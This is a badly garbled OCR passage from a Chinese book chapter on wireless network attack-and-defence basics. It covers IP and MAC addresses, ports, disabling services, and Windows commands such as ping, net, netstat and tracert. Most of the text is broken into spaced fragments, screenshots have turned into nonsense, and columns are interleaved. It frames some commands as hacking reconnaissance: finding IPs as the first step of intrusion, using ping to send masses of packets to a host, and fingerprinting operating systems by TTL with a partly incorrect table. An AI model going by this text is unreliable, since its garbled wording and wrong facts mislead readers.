e D 类 IP 地 址 第 一 个 字 节 以 “1110” 开 
始 ， 它 是 一 个 专门 保留 的 地 址 。 它 
并 不 指向 特定 的 网 络 ， 目 前 这 一 类 
地 址 被 用 在 多 点 广播 (Multicast) 
中 。 多 点 广播 地 址 用 来 一 次 寻 址 一 


组 计算 机 ， 它 标识 共享 同一 协议 的 
一 组 计算 机 。 
e FE 类 IP 地 址 。 以 “ll1110” 开 始 ， 为 将 
来 使 用 保留 ， 全 零 (“0.0.0.0”) 
地 址 对 应 于 当前 主机 ; 全 “1” 的 人 P 
由 者 02532555557552 了 :是 当 
前 子 网 的 广播 地 址 。 
具体 来 讲 ， 一 个 完整 的 IP 地 址 信息 应 
该 包括 人 P 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 
等 4 部 分 。 只 有 这 4 部 分 协同 工作 ， 才 能 与 
互联 网 中 的 计算 机 相互 访问 。 
e 子 网 掩 码 : 子 网 掩 码 是 与 IP 地址 结 
合 使 用 的 一 种 技术 。 主 要 作用 有 两 
个 : 一 是 用 于 确定 IP 地 址 中 的 网 络 
号 和 主机 号 ， 二 是 用 于 将 一 个 大 的 
卫 网 络 划分 为 若干 小 的 子 网 络 。 
e 默认 网 关 : 默认 网 关 意 为 一 台 主 机 
如 果 找 不 到 可 用 的 网 关 ， 就 把 数据 
包 发 送 给 默认 指定 的 网 关 ， 由 这 个 
网 关 来 处 理 数据 包 。 
e DNS: DNS 服务 用 于 将 用 户 的 域名 
请 求 转换 为 耻 地 址 。 


2.3.2 ”查看 I|P 地 址 


计算 机 的 IP 地 址 一 旦 被 分 配 ， 可 以 说 
是 固定 不 变 的 ， 因 此 ， 查 询 出 无 线 网 络 中 
计算 机 或 终端 设备 的 人 地址 ， 在 一 定 程度 上 
就 完成 了 黑客 入 侵 的 前 提 工 作 。 使 用 ipcon- 
fig 命 令 可 以 探知 无 线 网 络 中 计算 机 或 终端 
设备 IP 地 址 和 物理 地 址 。 

下 面 以 探知 无 线 网 络 中 计算 机 的 IP 地 
址 为 例 ， 来 介绍 查看 IP 地 址 的 操作 步 又 。 
Be 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


玲 幸 (S) 


运行 (R) 从 


关机 或 注销 (U) 


诸 面 (D) 


< 
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[step 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 输 
入 框 中 输入 cmd 命 令 ， 如 下 图 所 示 。 


可 运行 x 


Wndows 村 有 你 所 时 入 的 名 咎 为 人 打开 棚 和 的 程序 
文件 夹 . 文本 加 Internet 资源 


打开 (oj: |cmd 


浏览 (8)… 


[到 了 ][ 喜 


[Eeeg 图 单 击 “确定 ”按钮 ， 打 开 “ 命 令 提 示 
符 ” 窗 口 ， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig， 按 Enter 键 ， 即 可 显示 出 本 机 的 IP 
信息 ， 如 下 图 所 示 。 


5) 2018 于 crcsoft Corporaticn。 保 外 有 有 祝 讶 。 
| rs\A 
indows IP 配置 


stratoryipeonfig 


以 太 网 和 本 器 ssTsP 1: 
i 人 新 开 
i 


dl1:702e:e18dW5 


侈 提示 : 在 “命令 提示 符 ” 窗 口中 ， 
192.168.0.102 表 示 本 机 在 无 线 局 域 网 中 的 IP mg 
地 址 。 权 


2.4 MAC 地 址 


MAC 地 址 就 是 在 媒体 接 入 层 上 使 用 
的 地 址 ， 也 叫 物理 地 址 、 硬 件 地 址 或 链 路 
地 址 ， 由 网 络 设备 制造 商 生产 时 写 在 硬件 
内 部 。 


2.4.1 认识 MAC 地 址 本 


MAC 地 址 与 网 络 无 关 ， 即 无 论 将 带 首 茹 
有 这 个 地 址 的 硬件 (如 网 卡 、 集 线 器 、 路 
由 器 等 ) 接 入 到 网 络 的 何 处 ， 都 是 相同 的 
MAC 地 址 ， 它 由 厂商 写 在 网 卡 的 BIOS 里 。 
MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 2 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 
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如 : 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 

址 ， 其 中 前 6 位 十 六 进 制 数 08:00:20 代 表 网 

络 硬件 制造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 

后 3 位 十 六 进 制 数 0A:8C:6D 代 表 该 制造 商 所 

制造 的 某 个 网 络 产品 〈 如 网 卡 ) 的 系列 号 。 

每 个 网 络 制造 商 必须 确保 它 所 制造 的 

每 个 以 太 网 设备 都 具有 相同 的 前 三 个 字 

as 上 节 以 及 不 同 的 后 三 个 字 节 。 这 样 ， 就 可 保 

证 世界 上 每 个 以 太 网 设备 都 具有 唯一 的 
密 MAC 地 址 。 


Ce 


IP 地 址 与 MAC 地 址 的 区 别 在 于 : IP 
地 址 基于 逻辑 ， 上 比较 灵活 ， 不 受 硬件 限 
制 ， 也 容易 记忆 。MAC 地 址 在 一 定 程度 
上 与 硬件 一 致 ， 基 于 物理 ， 能 够 标识 具 
体 。 这 两 种 地 址 各 有 好 处 ， 使 用 时 也 因 
条 件 而 采取 不 同 的 地 址 。 


2.4.2 ”查看 MAC 地 址 
”如果 在 “命令 提示 符 ” 窗 口中 输入 ip- 


config /all 命 令 ， 然 后 按 Enter 键 ， 可 以 在 显 
出 的 结果 中 看 到 一 个 物理 地 址 : 6C-0B-84- 
3E-F7-AB， 这 个 就 是 用 户 自 己 的 计算 机 的 
网 卡 地 址 ， 它 是 唯一 的 ， 如 下 图 所 示 。 


以 二 网 话 配 器 以 本 网 9: 
六 特定 的 DIE 后 组 。。 


IOPIP 上 的 NetBI05 .......: 避 
Eeers Vrini 


2.5 ”什么 是 端口 


计算 机 与 外 界 通信 交流 的 出 口 可 以 认 
为 是 端口 。 一 个 IP 地 址 的 端口 可 以 有 65536 
( 即 256X256) 个 ， 端 口 是 通 过 端口 号 来 
标记 的 ， 端 口号 只 有 整数 ， 范 围 是 从 0 到 
65535 (256X256-1) 。 

2.5.1 ”认识 端口 

端口 ， 英 文 是 port。 在 计算 机 领域 中 ， 
端口 可 以 认为 是 计算 机 与 外 界 通信 交流 的 
出 口 。 计 算 机 领域 又 可 分 为 硬件 领域 和 软 
件 领域 ， 在 硬件 领域 中 ， 端 口 又 被 称 作 接 
口 ， 如 常见 的 USB 端 口 、 网 卡 接口 、 串 行 端 
口 等 ; 在 软件 领域 中 ， 端 口 一 般 是 指 网 络 中 
面向 连接 服务 和 无 连接 服务 的 通信 协议 端 
口 ， 是 一 种 抽象 的 软件 结构 ， 包 括 一 些 数 据 
结构 和 LO (基本 输入 输出 ) 缓冲 区 。 


在 网 络 技 术 中 ， 端 口 又 有 好 几 种 意 
思 ， 一 种 是 物理 意义 上 的 端口 ， 如 集 线 
器 、 交 换 机 、 路 由 器 等 连接 设备 用 于 连接 
其 他 的 网 络 设备 的 接口 ， 常 见 的 有 RJ-45 端 
口 、Serial 端 口 等 ， 另 一 种 是 逻辑 意义 上 的 
端口 ， 一 般 指 TCP/IP 协 议 中 的 端口 ， 范 围 
从 0 到 65535 (256X256-1) 。 


2.5.2 ”查看 系统 的 开放 端口 


经 常 查 看 系统 开放 端口 的 状态 变化 ， 
可 以 帮助 计算 机 用 户 及 时 提高 系统 安全 ， 


防范 黑客 通过 端口 入 侵 计 算 机 ， 用 户 可 以 
使 用 netstat 命 令 查看 自己 系统 端口 的 状态 。 
具体 操作 步骤 如 下 。 

[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 给 
入 netstat -a -n 命 令 ， 如 下 图 所 示 。 


10. 0. 17763. 104 
保留 所 有 权利 。 


:\VUsersVAdministrator>netstat -a -ne 


Microsoft Windows [ 众 
(ce) 2018 Microsoft Corporation。 


step 图 按 Enter 键 ， 即 可 看 到 以 数字 显示 的 
TCP 和 UCP 连 接 的 端口 号 及 其 状态 ， 如 下 图 
所 示 。 


10, 0, 17763, 10 
ce GorDotar on 优生 明和 有 权利。 


SNUsersNAdministratorynetetat -a -n 


外 部 地 址 状态 
0.0.0.0 


1 43:137 
UDP 192, 168. 0. 143:138 


2.5.3 ”关闭 不 必要 的 端口 


默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 
用 或 不 安全 的 端口 是 开启 的 ， 这 些 端口 很 
容易 被 黑客 利用 ， 为 保障 系统 的 安全 ， 可 
以 将 这 些 不 用 的 端口 关闭 。 关 闭 端口 的 方 
式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 的 
方式 来 关闭 不 必要 的 端口 。 

下 面 以 关闭 Remote Desktop Help Ses- 
sion Manager (Windows 远 程 协助 服务 ) 为 
例 进 行 介绍 ， 具 体操 作 步 又 如 下 。 
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step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “控制 面板 ”菜单 命令 ， 如 下 图 
所 示 。 


任务 管理 器 (1) 


控制 面板 (P) 人 


源 答 理 夺 (日 


step 图 打开 “控制 面板 ”窗口 ， 
工具 ”图 标 ， 如 下 图 所 示 。 


时 wa 
个 ,i ,Fe 
0 HR EV TEM wet) 
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EL ERA = 


笋 Bitiocker 虹 翅 加 祷 
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step 图 打开 “管理 工具 ”窗口 ， 双 击 “ 服 
务 ” 图 标 ， 如 下 图 所 示 。 
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时 人 寺 般 有 Se windom 6 过 
Das HE 
加 二 D Ee 
本 Wirdowa 上 ee 
en -a 
ae Ee i 
= os De 
局 cD Mebie fonner 。 而 RE 
ze -aas 
BA 
De 国电 


step 园 打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服 务 项 ， 如 下 图 所 示 。 
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3s 
Ec 

中 | 四 日 3 上 m ens 
2 


ra 


[se 图 双击 Branch Cache 服 务 项 ， 弹 出 
“Branch Cache 的 属性 ”对 话 框 ， 在 “启动 
类 型 ”下 拉 列 表 框 中 选择 “禁用 ”选项 ， 
然后 单 击 “ 确 定 ” 按 钮 ， 禁 用 Branch Cache 
服务 项 的 端口 ， 如 下 图 所 示 。 


BranchCache 的 属性 (本 地 计算 机 ) X 


第 规 。 本 录 。 恢复 。 依存 关系 


服务 名 条: PeerDistSve 

时 未 名 爷 : BranchCache 

指 述 : 此 服务 俐 存 来 各 本 地 子 同上 对 等 方 的 网 洛 内 容 

可 执行 文件 的 路 径 : 

CAWINDOWS\System32\svchost.exe -k PeerDist 

启动 闪 弄 (E): 手动 
生动 (延迟 启动 ) 
自动 
手动 

服务 状态 : 

Bah(S) 合 目 四 看 学 P) 居 复 (N 


妆 从 此 处 启动 服务 时 ， 你 可 指定 着 适用 的 启动 参数 


启动 参数 (M): 医 | 
取消 ER 
2.5.4 ”启动 需要 开启 的 端口 


开启 端口 的 操作 与 关闭 端口 的 方法 类 
似 ， 下 面具 体 介 绍 通过 启动 服务 方式 开启 
端口 的 具体 操作 步 又。 
[see 图 这 里 以 上 述 关 闭 的 Branch Cache 服 务 
端口 为 例 。 在 “Branch Cache 的 属性 ”对 话 
框 中 单 击 “ 启 动 类 型 ” 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 菜 单 中 选择 “自动 ”选项 ， 
如 下 图 所 示 。 
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BranchCache 的 尾 任 林地 计算 机 ) x 


号 规 ”本 好 尺 复 。 依 育 关系 


于 和 名人 

时 名称 

还 : 

可 了 行文 件 的 路 径 : 

CNWINDOWS\system3zvsvchostexe -k PeerDist 

语 SEE 昌吉 用 > 
目 动 (ER 启动 
手动 
要 用 

服务 状态 : 

BS 停 上 中 Eu] 做 R 


关 从 此 处 启动 县 务 是， 你 可 指定 所 适用 的 启动 参数 , 


I— 


应 二 (A) 


Ew Ew 


Gp 图 单 二 “应 用 ”按钮 激活“ 启动” 按 
钮 ， 如 下 图 所 示 。 


BranchCache 的 二 性 (本地 计算 机 ) 汉 


第 规 。 登录 。 恢复 。 依 请 关系 


服务 全 你 peerDistsvd 

显示 名 称 : BranchCache 

到: 此 服务 潮 和 来 各 本 地 子 网 上 对 等 方 的 网 络 内 容 . 

可 执行 文件 的 路 径 : 

CAWINDOWS\System32\svchost.exe -k PeerDist 

Ba): GE v 
服务 状态 : BL 


停 直 人 T) ad 2] 


启动 (S) 


当 从 此 处 富 动 服务 时 ， 你 可 播 定 所 适用 的 启动 参数 - 


启动 参数 (M): 


[step 图 单 去 “启动 ”按钮 ， 即 可 启动 Branch 
Cache 服 务 ， 再 次 单 击 “ 应 用 ”按钮 ， 在 
“Branch Cache 的 属性 ”对 话 框 中 可 以 看 到 
该 服务 的 “服务 状态 ”已 经 变 为 “正在 运 
行 ”， 如 下 图 所 示 。 


应 用 (A] 


BranchCache 的 属性 (本 地 计算 机 )} x 


第 规 。 登录 。 恢复 。 依存 关系 


服务 名 称 : peerDistsvd 
显示 名 称 : BranchCache 
后 述 : 此 服务 烧 存 来 全 本 地 子 网 上 对 等 方 的 网 阁 内 容 . 
可 执行 文件 的 路 径 : 
CAWINDOWS\System32\svchost.exe -k PeerDist 
启动 关 型 (E): 生动 
服务 状态 ; 正在 运行 
启动 (5) 停 上 芹 了 P 全 向 IR 


当 从 此 处 局 动 服 务 时 ， 你 可 指定 所 适用 的 启动 参数 . 


启动 参数 (M): [ 


[step 园 单 击 “ 确 定 ” 按 钮 ， 返回 到 “服务 ” 

窗口 之 中 ， 此 时 即 可 发 现 Branch Cache 服 务 
的 “启用 类 型 ”被 设置 为 “正在 运行 ”。 

这 样 就 可 以 成 功 开 启 Branch Cache 服 务 对 应 
的 端口 ， 如 下 图 所 示 。 


取消 应 必 [A) 


2.6 ”黑客 常用 的 DOS 命 令 


熟练 掌握 一 些 DOS 命 令 是 一 名 黑客 
的 基本 功 ， 下 面 就 来 介绍 一 些 黑客 常用 的 
DOS 命 令 ， 了 解 这 样 命 令 可 以 帮助 用 户 
追踪 黑客 的 踪迹 ， 提 高 个 人 电子 设备 的 
全 
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2.6.1 


cd 命令 


cd (change directory) 命令 的 作用 是 改 


变 当前 目录 ， 该 命令 被 用 于 切换 路 径 目 录 。 
cd 命令 主要 有 以 下 三 种 使 用 方法 : 

e cd path: path 是 路 径 ， 例 如 输入 cd 

ci\ 命 令 和 cd Windows 命 令 即 可 分 别 
切换 到 Ci\ 和 C:\Windows 目录 下 。 

e cd..: cd 后 面 的 两 个 “.” 表 示 返 回 到 

上 一 级 目录 ， 例 如 当前 的 目录 为 C:\ 
Windows， 如 果 输 入 cd.. 命 令 ， 按 Enter 
键 即 可 返回 到 上 一 级 目录 ， 即 C:。 

e cd\: 表示 当前 无 论 在 哪个 子 级 目 

录 下 ， 通 过 该 命令 立即 返回 到 根 目 
录 下 。 

下 面 将 介绍 使 用 cd 命令 进入 C:\Win- 
dows\system32 子 目录 ， 并 退回 根 目录 的 具 
体操 作 步 又 。 

[step 国 在 “命令 提示 符 ” 窗 口中 输入 cd ci\ 命 
令 ， 按 Enter 键 ， 即 可 将 目录 切换 为 C\， 如 
下 图 所 示 。 


10. 0. 17763. 104. ~ 


icrosoft Windows 
(c) 2018 了 crosoft Corporation。 保 留 所 有 权利 。 


:\Users\Administrator>cd c:\ 


:\> 


[step 图 如 有 果 想 进入 C:\Windows\system32 目 录 
中 ， 则 需 在 上 图 的 “命令 提示 符 ” 窗 口中 
输入 cd Windows\system32 命 令 ， 按 Enter 键 
即 可 将 目录 切换 为 C:\Windows\system32， 
如 下 图 所 示 。 


icrosoft Windows [| 


(c) 2018 下 crosoft Corporation。 保 留 所 有 权利 。 


:MUsersVAdministrator>cd c:\ 


10. 0. 17763. 104] 


:Ved Vindows\system32 


:\Windows\System32>, 
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Fa 如 果 想 返回 到 上 一 级 目录 中 ， 则 有 为 以 下 几 种 形式 : 


在 “命令 提示 符 ” 窗 口中 输入 cd.. 命 令 e /as: 显示 系统 文件 的 信息 。 

Enter 键 即 可 返回 到 上 一 级 目录 下 ， ee ® /ah: ee i 

所 示 。 ® /ar 只 读 文 件 的 信息 。 

® /aa: 县 直 时 的 文件 的 析 才 。 

(e208 dt Crporati on 保留 共有 权利 。 入 e /ad: 显示 目录 信息 。 
:\Users\Administrator>cd c:\ 下 面 将 介绍 在 “命令 提示 符 ” 窗 口中 
ea Mindoms\eyetens? 使 用 dir 命 令 查看 磁盘 中 的 资源 的 具体 操作 
:\Windows\System32>cd .. 步骤 。 

:Vindows>。 


Estee 加 在 “命令 提示 符 ” 窗 口中 输入 dir 命 
令 ， 按 Enter 键 ， 即 可 查看 当前 目录 下 的 资 
源 列表 ， 如 下 图 所 示 。 


如 果 想 返回 到 根 目录 ， 则 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 cd 命令 ， 按 Enter 键 性 


即 可 返回 到 根 目 录 下 ， 如 下 图 所 示 。 所 洗 giratorydir 
9 


» 信 因 新 大 权 利 。 


icrosoft Windows 10. 0. 17763. 104. ~ 
(c) 2018 JG crosoft Corporation。 保 留 所 有 权利 。 


:\Users\Administrator>cd c:\ 
:>cd Windows\system32 
:Windows\System32>cd .. 
:Windows>cd \ 

:Ve 


19450, log 
CE in 2d 0 L4G, 1og 
dae-lnsrudio-2092, 1o8 
Lrks 


昌 2.6.2 dir 命令 


玉 ”dir 命令 的 作用 是 列 出 磁盘 上 所 有 的 或 
指定 的 文件 目录 ， 可 以 显示 的 内 容 包含 卷 
标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 


Sansung Galaxy lote - 生 上 1 - MAP] 


Saved Gamps 


:NUssrswaninistrator) 


时 间 、 目 录 名 、 磁 盘 剩 余 空间 等 。 | 
di 命令 的 格式 如 下 : 在 “命令 提示 符 ” 窗 口中 输入 dir e:/ 
dir [ 盘 符 ] [路 径 ] [文件 名 ] [/p] [/w] [/a: 属 性 ] aid 命 令 ， 按 Enter 键 ， 即 可 查看 E 盘 下 的 所 
其 中 各 个 参数 的 作用 如 下 : 有 文件 的 目录 ， 如 下 图 所 示 。 


e p: 当 显 示 的 信息 超过 一 屏 时 暂停 显 
示 ， 直 至 按 任意 键 才 继续 显示 

e /w: 以 横向 排列 的 形式 显示 文件 名 
和 目录 名 ， 每 行 5 个 不 显示 文件 大 
小 、 建 立 日 期 和 时 间 ) ， 


六 件 有 
3 个 目录 13, 410, 578, 432 可 用 宇 节 


e /a( 属 性 ) : 仅 显示 指定 属性 的 文 Feweinisete> 


件 ， 无 此 参数 时 ，DIR 显 示 除 系统 [Eee 国 在 “命令 提示 符 ” 窗 口 输入 dir 
和 隐 含 文件 外 的 所 有 文件 。 可 指定 ”ci\windows /a:h 命 令 ， 按 Enter 键 即 可 列 出 ci\ 
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windows 目 录 下 的 隐藏 文件 ， 如 下 图 所 示 。 


crasnEt Windows 


10. 0. 17753, 104] | 
[Le) 2018 Kicrosoft Corparation。 保留 所 有 权利 - 


Fs Vsers\ i Es 
i GEOG-Cool 
:Winsows 的 目录 

4 -: 蒂 11:46 DIR> 


201970171: 06:50 <DIR> 
2018/09/15 年 :A 


EE 


or}dir c: Windows /a:h 


BitLockorDiscoveryYoluneContents 


D018/00/ 1 


2.6.3 ”ping 命 令 


ping 命 令 是 TCP/IP 协 议 中 最 为 常用 的 
命令 之 一 ， 主 要 用 来 检查 网 络 是 否 通畅 或 
者 网 络 连接 的 速度 ， 作 为 一 个 黑客 来 说 ， 
ping 命 令 是 第 一 个 必须 掌握 的 DOS 命 令 。 在 
“命令 提示 符 ” 窗 口中 输入 ping /?， 可 以 得 
到 这 条 命令 的 帮助 信息 。 


人 Sasoft Winaows 10. 0. 17763. 104] py 
(c) 2018 隆 crosoft Corpcration。 保 留 所 有 权利 。 
P:NUsersvAanini strator>ping /9 
用 法 : ping [-t] [-a] [-n count] [-1 size] [-1] [-i TIL] [-v TOS] 
~r soumt] [-s count] [[-j hosr-list] | [-k host-list]] 


[-w rtmeout] [-R] [-3 srcaddr] [-¢ comparrment] [-p] 
4] [-6] Larget_nane 


和 省 项 : 
ha cheme 
包 和 CrrlrC， 
at 3 
革 中 从 ee leo. 
3 Tos 


la IPyd)» 
于 各 证 于 rrva) 
， eT IPvg), 


| 
> 中 % 人 适用 于 IFv6)。 
1 


颖 启 拟 化 提供 程序 地 址 ， 


~ tinmEcut 
R 


FE Nsers\Acnini strator> 


使 用 ping 命 令 对 计算 机 的 连接 状态 进行 
测试 的 具体 操作 步骤 如 下 。 
[steep 回 使 用 ping 命 令 来 判断 计算 机 的 操作 
系统 类 型 。 在 “命令 提示 符 ” 窗 口中 给 
入 “192.168.0.1” 命 令 ， 右 上 图 为 其 运行 
结果 。 
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oft Vindowe 10.0. 17763. 10: 加 
18 Ji crosoft Corporation。 保留 所 有 权利 。 


C:\sers\Adninistratorping 192.158.0.1 
Ping 192,168.0, 1 具有 弛 字 节 | 


58. 四 
回复 : 
1 192. 168.0L1 和 
引 192. 168. 0 1 的 回复 : 
pet pige < 


192.168.0.1 -t -1 128 命 令 ， 
主机 发 出 大 量 的 数据 包 ， 如 下 图 所 示 。 


10.0, 17763, 10 A 
soft Corporation。 保 贸 所 有 权利 - 


C:\Users\Administratorping 192. 168.0.1 -t -1 128 


168. 0 疾 呈 在 128 字 节 和 
: 全 六 3 


lL 64 
《lme TIL=64 
=lms TIL=64 

后 ci 下 六 


lms TIL-64 
=lms TIL=64 
下 -lno TTL=64 
加 =lms TTL=64 
=lms TTL=64 


加 号 号 号 号 驴 号 号 SB 
回回 回回 享 回回 回回 司 } 


判断 本 台 计 算 机 是 否 与 外 界 网 络 连 
通 。 在 “命令 提示 符 ” 窗 口中 输入 ping www. 
baidu.com 命 令 ， 下 图 为 其 运行 结果 ， 说 明 本 
台 计 算 机 与 外 界 网 络 连通 。 


FE:NUsereVAdninistratcr)e 


[Step 四 解析 某 IP 地 址 的 计算 机 名 。 在 “ 命 
令 提示 符 ” 窗 口中 输入 ping -a 192.168.1. 
102 命 令 ， 下 图 为 其 运行 结果 ， 这 人 台 主 
机 的 名 称 为 “SC-201811151232.DHCP 
HOST” 。 


LE 
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服务 ， 如 下 图 所 示 。 


10.0, 
ke 018 ae Corporation, 人 


| i ft Windows [| 10. 0. 17763. 104] ~ 
具有 32 字 记 的 堵 据 : (es Coration 保 久 挤 有 权利 - 


CNUsersNAdmini stratcr>net start 


已 经 局 动 以 下 Windows 服务 : 


AdaptiveSleepService 
AND External Events Utility 

AHD FUEL Service 

Application Information 

ani hse ti AppX Deployment Service (AppXSVC) 


Backeground Tasks Infrastructure Service 
Base Filtering Engine 
cbdhsvc_50bf2 
、 CDPLsersyc_50bf2 
知识 链接 CNG Key Isclation 


Computer Browser 


利用 TTL 值 判断 操作 系统 类 型 CE 证 


Cryptographic Services 
由 于 不 同 的 操作 系统 的 主机 设置 的 Ts 2 
TTL 值 是 不 同 的 ， 所 以 可 以 根据 TTL 值 来 Dt 


Flash Helper Service 


识别 操作 系统 类 型 在 一 般 情况 下 : Function Discovery Provider Host 归 
e@ TTL=32 则 认为 目标 主机 操作 系统 为 
Windows 95/98。 2.6.5 netstat 命 令 
@ TTL=64-128 就 认为 主机 操作 系统 为 netstat 命 令 主要 用 来 显示 网 络 连接 的 信 
Windows NT/2000/XP/7/10。 息 ， 包 括 显示 活动 的 TCP 连 接 、 路 由 器 和 网 


e TIL=128-255 或 者 32-64 就 认为 主机 络 接口 信息 ， 是 一 个 监控 TCP/IP 网 络 非常 
操作 系统 是 UNIX/Linux 操 作 系 统 。 有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 目前 
都 有 哪些 网 络 连接 正常 。 
加 2.6.4 “net 命令 在 “命令 提示 符 ” 窗 口中 输入 netstat 


人 用 act 命令 可 以 查询 网 络 状态 、 其 享 | /2， 可 以 得 到 这 条 命令 的 帮助 信息 。 
资源 以 及 计算 机 所 开启 的 服务 等 ， 该 命令 
的 语法 格式 信息 如 下 
NET [ ACCOUNTS | COMPUTER | CONFIG | 
CONTINUE | FILE | GROUP | HELP | 
HELPMSG | LOCALGROUP | NAME | 
PAUSE | PRINT | SEND | SESSION | 


SHARE | START | STATISTICS | STOP 
| TIME | USE | USER | VIEW ] ete 


查询 本 台 计 算 机 开启 那些 Windows 服 务 
的 具体 操作 步骤 如 下 。 : os ne fe ne te: 
Be 图 使 用 net 命 令 查看 网 络 状态 。 打 开 ， 
“命令 提示 符 ” 窗 口 ， 在 命令 行 下 输入 net 省 
start 命 令 ， 如 下 图 所 示 。 


或 


二 和 : 


该 命令 的 语法 格式 信息 如 下 ; 
man a. ES ut 
[ proto] [-r] [-s] [-v] [intervall] 


:\Users\Adninistratorner starte 


其 中 比较 重要 的 参数 含义 如 下 : 
e -a: 显示 所 有 连接 和 监听 端口 。 
[step 图 按 Enter 键 ， 则 可 以 在 打开 的 “命令 提 e -n: 以 数字 形式 显示 地 址 和 端口 号 。 


示 符 ”窗口 中 显示 计算 机 所 启动 的 Windows 使 用 netstat 命 令 查 看 网 络 连接 的 具体 步 
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又 如 下 。 

[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netstat -n 或 netstat 命 令 ， 按 Enter 键 ， 即 可 查 
看 服务 器 活动 的 TCP/IP 连 接 ， 如 下 图 所 示 。 


icrosoft Windows [人 本 10.0, 17763.104] 四 
(9 3018 量 crcaoft Corporation。 欠 入 前 有 祝 利 。 


PR:VUsersVAdmini stratorynetetat 
活动 这 拉 

协议 本 地 地 址 
Te 


[step 园 在 “命令 提示 符 ” 窗 口中 输入 netstat 一 
I 命令 ， 按 Enter 键 ， 即 可 查看 本 机 路 由 信息 
内 容 ， 如 下 图 所 示 。 


口中 输入 netstat 一 
a 命令 ， 按 Enter 键 ， 即 可 查看 本 机 所 有 活动 
的 TCP/IP 连 接 ， 如 下 图 所 示 。 


EE 国 在 “命令 提示 符 ” 窗 


TSTEMTNE 
ITTSTEMTNE 


Ee- 


第 2 章 无 线 网 络 攻防 必 备 知识 


[see 加 在 “命令 提示 符 ” 窗 口中 输入 netstat 
-n -a 命 令 ， 按 Enter 键 ， 即 可 显示 本 机 所 有 
连接 的 端口 及 其 状态 ， 如 下 图 所 示 。 


TEST 
TESTDINL EE 


2.6.6 tracert 命 令 


使 用 tracert 命 令 可 以 查看 网 络 中 路 由 日 
节点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 命 


令 后 追加 一 个 参数 ， 表 示 检 测 和 查看 连接 
当前 主机 经 历 了 哪些 路 由 节点 ， 适 合用 于 
大 型 网 络 的 测试 ， 该 命令 的 语法 格式 信息 
如 下 : 


tracert 
Hostlist] 


[-d] [-h MaximumHops] [-j 
[-w Timeout] [TargetName] 


其 中 各 个 参数 的 含义 如 下 : 
e -d: 防止 解析 目标 主机 的 名 字 ， 可 
以 加 速 显示 tracert 命 令 结果 。 
e -h MaximumHops: 指定 搜索 到 目标 
地 址 的 最 大 跳跃 数 ， 默 认 值 为 30 个 
跳跃 点 。 
e -j Hostlist: 按照 主机 列表 中 的 地 址 
释放 源 路 由 。 
e -w Timeout: 指定 超时 时 间 间 隔 ， 默 
认 单 位 为 ms。 
e TargetName: 指定 目标 计算 机 。 
例如 : 如 果 想 查看 www.baidu.com 的 
路 由 与 局 域 网 络 连接 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 
命令 ， 按 Enter 键 ， 下 图 为 其 显示 结果 。 
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过; 
i i 


<1 本 秒 192. 168. 9 


国 
ms 


电 
7 
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站 107 ms 
二 

9 me 

和 

的 

* 

6 ms 


+ 请 求 超时。 
后 由 ns 220.181 112.244 


踪 完 成 
b:\Usoro\Adrinistrator> 


2.7 ”实战 演练 


实战 演练 1 一 一 显示 文件 的 后 缀 扩展 名 


Windows 10 系 统 默认 情况 下 并 不 显示 
文件 的 扩展 名 ， 用 户 可 以 通过 设置 显示 文 
件 的 扩展 名 。 有 具体 操作 步骤 如 下 。 

Eeep 园 单 去 “开始 ”按钮 ， 在 弹出 快捷 菜 
单 中 选择 “文件 资源 管理 器 ”选项 ， 打 开 
“文件 资源 管理 器 ”窗口 ， 如 下 图 所 示 。 


" EE = 
mn 1。 旺 © 
| 

A 了 -Exf 二 人 四 
加 sm 了 
+ -和 
大 * * 
Ep * Te 
Bm 区 :党 
pp 
可 = 
mona 网 洋 
a our et 
本 艺 
Pe 
i an 
好 革 ne 
但 
a ne 


[step 图 选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 选中 “显示 /隐藏 ”区 域 的 “文件 扩 
展 名 ” 复 选 框 ， 如 下 图 所 示 。 
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step 图 此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 ， 如 下 图 所 示 。 


实战 演练 2 一 一 关闭 开机 多 余 启动 项 目 
在 计算 机 启动 的 过 程 中 ， 自 动 运行 的 

程序 叫 作 开机 启动 项 ， 有 时 一 些 木 马 病毒 

程序 会 在 开机 时 就 运行 ， 用 户 可 以 通过 关 

闭 开 机 启动 项 目 来 提高 系统 安全 。 
具体 的 操作 步骤 如 下 。 

Esteep 回 按键 盘 上 的 Ctrl+AltHtDel 组 合 键 ， 打 

开 “ 任 务 管 理 器 ”界面 ， 如 下 图 所 示 。 


[ep 图 单 去 “任务 管理 器 ”选项 ， 打 开 “ 任 
务 管理 器 ”窗口 ， 如 下 图 所 示 。 
主 (2 闪 了 次 


文件 四 ”应 页 IO 二 看) 
进 已 攻 角 应 用 历史 记录 启动 月 户 这 如 信息 服务 


Windows 将 过 舌 
局 

后 台 进 程 (41) 
后 350& 全 NA 二 
大 350 安 全 刘 涡 各 
E3602 
B350= 人 2 
5 350 安 全 要 


了 了 等 路 信息 (D) 


[ep 国 选择 “启动 ”选项 卡 ， 进 入 “启动 ” 
界面 ， 在 其 中 可 以 看 到 系统 当中 的 已 启用 
启动 项 列表 ， 如 下 图 所 示 。 


Ld - OO x 
文件 (月 ”和 远 项 (0) 查看 (V) 
进程 性 艇 应 用 历 实 记录 启动 下 户 详细 信息 服务 


